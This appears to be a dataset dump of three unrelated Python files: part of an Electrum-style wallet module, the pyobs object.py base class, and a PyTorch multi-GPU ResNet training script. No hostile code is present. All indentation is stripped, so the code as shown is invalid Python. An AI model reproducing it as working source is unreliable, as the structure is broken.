pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
object.py
|
"""
:class:`~pyobs.object.Object` is the base for almost all classes in *pyobs*. It adds some convenience methods
and helper methods for creating other Objects.
:func:`~pyobs.object.get_object` is a convenience function for creating objects from dictionaries.
"""
from __future__ import annotations
import datetime
import threading
from typing import Union, Callable, TypeVar, Optional, Type, List, Tuple, Dict
import logging
import pytz
from astroplan import Observer
from astropy.coordinates import EarthLocation
import pyobs
log = logging.getLogger(__name__)
"""Class of an Object."""
ObjectClass = TypeVar('ObjectClass')
def get_object(config_or_object: Union[dict, object], object_class: Type[ObjectClass] = None, *args, **kwargs) \
-> ObjectClass:
"""Creates object from config or returns object directly, both optionally after check of type.
Args:
config_or_object: A configuration dict or an object itself to create/check. If a dict with a class key
is given, a new object is created.
object_class: Class to check object against.
Returns:
(New) object (created from config) that optionally passed class check.
Raises:
TypeError: If the object does not match the given class.
"""
if config_or_object is None:
# nothing to do?
raise TypeError('No config or object given.')
elif isinstance(config_or_object, dict):
# a dict is given, so create object
obj = create_object(config_or_object, *args, **kwargs)
else:
# just use given object
obj = config_or_object
# do we need a type check and does the given object pass?
if object_class is not None and not isinstance(obj, object_class):
raise TypeError('Provided object is not of requested type %s.' % object_class.__name__)
return obj
def get_class_from_string(class_name):
parts = class_name.split('.')
module_name = ".".join(parts[:-1])
cls = __import__(module_name)
for comp in parts[1:]:
cls = getattr(cls, comp)
return cls
def create_object(config: dict, *args, **kwargs):
# get class name
class_name = config['class']
# create class
klass = get_class_from_string(class_name)
# create object
return klass(*args, **config, **kwargs)
class Object:
"""Base class for all objects in *pyobs*."""
def __init__(self, vfs: Union[pyobs.vfs.VirtualFileSystem, dict] = None,
timezone: Union[str, datetime.tzinfo] = 'utc', location: Union[str, dict, EarthLocation] = None,
*args, **kwargs):
"""
.. note::
Objects must always be opened and closed using :meth:`~pyobs.object.Object.open` and
:meth:`~pyobs.object.Object.close`, respectively.
This class provides a :class:`~pyobs.vfs.VirtualFileSystem`, a timezone and a location. From the latter two, an
observer object is automatically created.
Object also adds support for easily adding threads using the :meth:`~pyobs.object.Object.add_thread_func`
method as well as a watchdog thread that automatically restarts threads, if requested.
Using :meth:`~pyobs.object.Object.add_child_object`, other objects can be (created an) attached to this object,
which then automatically handles calls to :meth:`~pyobs.object.Object.open` and :meth:`~pyobs.object.Object.close`
on those objects.
Args:
vfs: VFS to use (either object or config)
timezone: Timezone at observatory.
location: Location of observatory, either a name or a dict containing latitude, longitude, and elevation.
"""
from pyobs.vfs import VirtualFileSystem
# an event that will be fired when closing the module
self.closing = threading.Event()
# closing event
self.closing = threading.Event()
# child objects
self._child_objects: List[Object] = []
# create vfs
if vfs:
self.vfs = get_object(vfs, VirtualFileSystem)
else:
self.vfs = VirtualFileSystem()
# timezone
if isinstance(timezone, datetime.tzinfo):
self.timezone = timezone
elif isinstance(timezone, str):
self.timezone = pytz.timezone(timezone)
else:
raise ValueError('Unknown format for timezone.')
log.info('Using timezone %s.', timezone)
# location
if location is None:
self.location = None
elif isinstance(location, EarthLocation):
self.location = location
elif isinstance(location, str):
self.location = EarthLocation.of_site(location)
elif isinstance(location, dict):
self.location = EarthLocation.from_geodetic(location['longitude'], location['latitude'],
location['elevation'])
else:
raise ValueError('Unknown format for location.')
# create observer
self.observer: Optional[Observer] = None
if self.location is not None:
log.info('Setting location to longitude=%s, latitude=%s, and elevation=%s.',
self.location.lon, self.location.lat, self.location.height)
self.observer = Observer(location=self.location, timezone=timezone)
# opened?
self._opened = False
# thread function(s)
self._threads: Dict[threading.Thread, Tuple] = {}
self._watchdog = threading.Thread(target=self._watchdog_func, name='watchdog')
def add_thread_func(self, func: Callable, restart: bool = True):
"""Add a new function that should be run in a thread.
MUST be called in constructor of derived class or at least before calling open() on the object.
Args:
func: Func to add.
restart: Whether to restart this function.
"""
# create thread
t = threading.Thread(target=Object._thread_func, name=func.__name__, args=(func,))
# add it
self._threads[t] = (func, restart)
def open(self):
"""Open module."""
# start threads and watchdog
for thread, (target, _) in self._threads.items():
log.info('Starting thread for %s...', target.__name__)
thread.start()
if len(self._threads) > 0 and self._watchdog:
self._watchdog.start()
# open child objects
for obj in self._child_objects:
if hasattr(obj, 'open'):
obj.open()
# success
self._opened = True
@property
def opened(self):
"""Whether object has been opened."""
return self._opened
def close(self):
"""Close module."""
# request closing of object (used for long-running methods)
self.closing.set()
# close child objects
for obj in self._child_objects:
if hasattr(obj, 'close'):
obj.close()
# join watchdog and then all threads
if self._watchdog and self._watchdog.is_alive():
self._watchdog.join()
[t.join() for t in self._threads.keys() if t.is_alive()]
@staticmethod
def _thread_func(target):
"""Run given function.
Args:
target: Function to run.
"""
try:
target()
except:
log.exception('Exception in thread method %s.' % target.__name__)
def _watchdog_func(self):
"""Watchdog thread that tries to restart threads if they quit."""
while not self.closing.is_set():
# get dead threads that need to be restarted
dead = {}
for thread, (target, restart) in self._threads.items():
if not thread.is_alive():
dead[thread] = (target, restart)
# restart dead threads or quit
for thread, (target, restart) in dead.items():
if restart:
log.error('Thread for %s has died, restarting...', target.__name__)
del self._threads[thread]
thread = threading.Thread(target=target, name=target.__name__)
thread.start()
self._threads[thread] = (target, restart)
else:
log.error('Thread for %s has died, quitting...', target.__name__)
self.quit()
return
# sleep a little
self.closing.wait(1)
def check_running(self):
"""Check, whether an object should be closing. Can be polled by long-running methods.
Raises:
InterruptedError: Raised when object should be closing.
"""
if self.closing.is_set():
raise InterruptedError
return True
def add_child_object(self, config_or_object: Union[dict, object] = None, object_class: ObjectClass = None,
**kwargs) -> ObjectClass:
"""Create a new sub-module, which will automatically be opened and closed.
Args:
config: Module definition
Returns:
The created module.
"""
# what did we get?
if isinstance(config_or_object, dict):
# create it fro
obj = get_object(config_or_object, object_class=object_class,
timezone=self.timezone, location=self.location, **kwargs)
elif config_or_object is not None:
# seems we got an object directly, try to set timezone and location
obj = config_or_object
if hasattr(config_or_object, 'timezone'):
config_or_object.timezone = self.timezone
if hasattr(config_or_object, 'location'):
config_or_object.location = self.location
elif object_class is not None:
# no config or object given, do we have a class?
obj = object_class(**kwargs, timezone=self.timezone, location=self.location)
else:
# not successful
raise ValueError('No valid object description given.')
# add to list
self._child_objects.append(obj)
# return it
return obj
__all__ = ['get_object', 'get_class_from_string', 'create_object', 'Object']
|
train_multi_gpu_using_spawn.py
|
import os
import math
import tempfile
import argparse
import torch
import torch.multiprocessing as mp
from torch.multiprocessing import Process
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
from model import resnet34
from my_dataset import MyDataSet
from utils import read_split_data, plot_data_loader_image
from multi_train_utils.distributed_utils import dist, cleanup
from multi_train_utils.train_eval_utils import train_one_epoch, evaluate
def main_fun(rank, world_size, args):
if torch.cuda.is_available() is False:
raise EnvironmentError("not find GPU device for training.")
# 初始化各进程环境 start
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "12355"
args.rank = rank
args.world_size = world_size
args.gpu = rank
args.distributed = True
torch.cuda.set_device(args.gpu)
args.dist_backend = 'nccl'
print('| distributed init (rank {}): {}'.format(
args.rank, args.dist_url), flush=True)
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
dist.barrier()
# 初始化各进程环境 end
rank = args.rank
device = torch.device(args.device)
batch_size = args.batch_size
num_classes = args.num_classes
weights_path = args.weights
args.lr *= args.world_size # 学习率要根据并行GPU的数量进行倍增
if rank == 0: # 在第一个进程中打印信息,并实例化tensorboard
print(args)
print('Start Tensorboard with "tensorboard --logdir=runs", view at http://localhost:6006/')
tb_writer = SummaryWriter()
if os.path.exists("./weights") is False:
os.makedirs("./weights")
train_info, val_info, num_classes = read_split_data(args.data_path)
train_images_path, train_images_label = train_info
val_images_path, val_images_label = val_info
# check num_classes
assert args.num_classes == num_classes, "dataset num_classes: {}, input {}".format(args.num_classes,
num_classes)
data_transform = {
"train": transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),
"val": transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])}
# 实例化训练数据集
train_data_set = MyDataSet(images_path=train_images_path,
images_class=train_images_label,
transform=data_transform["train"])
# 实例化验证数据集
val_data_set = MyDataSet(images_path=val_images_path,
images_class=val_images_label,
transform=data_transform["val"])
# 给每个rank对应的进程分配训练的样本索引
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data_set)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_data_set)
# 将样本索引每batch_size个元素组成一个list
train_batch_sampler = torch.utils.data.BatchSampler(
train_sampler, batch_size, drop_last=True)
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
if rank == 0:
print('Using {} dataloader workers every process'.format(nw))
train_loader = torch.utils.data.DataLoader(train_data_set,
batch_sampler=train_batch_sampler,
pin_memory=True,
num_workers=nw,
collate_fn=train_data_set.collate_fn)
val_loader = torch.utils.data.DataLoader(val_data_set,
batch_size=batch_size,
sampler=val_sampler,
pin_memory=True,
num_workers=nw,
collate_fn=val_data_set.collate_fn)
# 实例化模型
model = resnet34(num_classes=num_classes).to(device)
# 如果存在预训练权重则载入
if os.path.exists(weights_path):
weights_dict = torch.load(weights_path, map_location=device)
load_weights_dict = {k: v for k, v in weights_dict.items()
if model.state_dict()[k].numel() == v.numel()}
model.load_state_dict(load_weights_dict, strict=False)
else:
checkpoint_path = os.path.join(tempfile.gettempdir(), "initial_weights.pt")
# 如果不存在预训练权重,需要将第一个进程中的权重保存,然后其他进程载入,保持初始化权重一致
if rank == 0:
torch.save(model.state_dict(), checkpoint_path)
dist.barrier()
# 这里注意,一定要指定map_location参数,否则会导致第一块GPU占用更多资源
model.load_state_dict(torch.load(checkpoint_path, map_location=device))
# 是否冻结权重
if args.freeze_layers:
for name, para in model.named_parameters():
# 除最后的全连接层外,其他权重全部冻结
if "fc" not in name:
para.requires_grad_(False)
else:
# 只有训练带有BN结构的网络时使用SyncBatchNorm采用意义
if args.syncBN:
# 使用SyncBatchNorm后训练会更耗时
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
# 转为DDP模型
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
# optimizer
pg = [p for p in model.parameters() if p.requires_grad]
optimizer = optim.SGD(pg, lr=args.lr, momentum=0.9, weight_decay=0.005)
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
lf = lambda x: ((1 + math.cos(x * math.pi / args.epochs)) / 2) * (1 - args.lrf) + args.lrf # cosine
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
for epoch in range(args.epochs):
train_sampler.set_epoch(epoch)
mean_loss = train_one_epoch(model=model,
optimizer=optimizer,
data_loader=train_loader,
device=device,
epoch=epoch)
scheduler.step()
sum_num = evaluate(model=model,
data_loader=val_loader,
device=device)
acc = sum_num / val_sampler.total_size
if rank == 0:
print("[epoch {}] accuracy: {}".format(epoch, round(acc, 3)))
tags = ["loss", "accuracy", "learning_rate"]
tb_writer.add_scalar(tags[0], mean_loss, epoch)
tb_writer.add_scalar(tags[1], acc, epoch)
tb_writer.add_scalar(tags[2], optimizer.param_groups[0]["lr"], epoch)
torch.save(model.module.state_dict(), "./weights/model-{}.pth".format(epoch))
# 删除临时缓存文件
if rank == 0:
if os.path.exists(checkpoint_path) is True:
os.remove(checkpoint_path)
cleanup()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--num_classes', type=int, default=5)
parser.add_argument('--epochs', type=int, default=30)
parser.add_argument('--batch-size', type=int, default=16)
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--lrf', type=float, default=0.1)
# 是否启用SyncBatchNorm
parser.add_argument('--syncBN', type=bool, default=True)
# 数据集所在根目录
# http://download.tensorflow.org/example_images/flower_photos.tgz
parser.add_argument('--data-path', type=str, default="/home/wz/data_set/flower_data/flower_photos")
# resnet34 官方权重下载地址
# https://download.pytorch.org/models/resnet34-333f7ec4.pth
parser.add_argument('--weights', type=str, default='resNet34.pth',
help='initial weights path')
parser.add_argument('--freeze-layers', type=bool, default=False)
# 不要改该参数,系统会自动分配
parser.add_argument('--device', default='cuda', help='device id (i.e. 0 or 0,1 or cpu)')
# 开启的进程数(注意不是线程),在单机中指使用GPU的数量
parser.add_argument('--world-size', default=4, type=int,
help='number of distributed processes')
parser.add_argument('--dist-url', default='env://', help='url used to set up distributed training')
opt = parser.parse_args()
# when using mp.spawn, if I set number of works greater 1,
# before each epoch training and validation will wait about 10 seconds
# mp.spawn(main_fun,
# args=(opt.world_size, opt),
# nprocs=opt.world_size,
# join=True)
world_size = opt.world_size
processes = []
for rank in range(world_size):
p = Process(target=main_fun, args=(rank, world_size, opt))
p.start()
processes.append(p)
for p in processes:
p.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.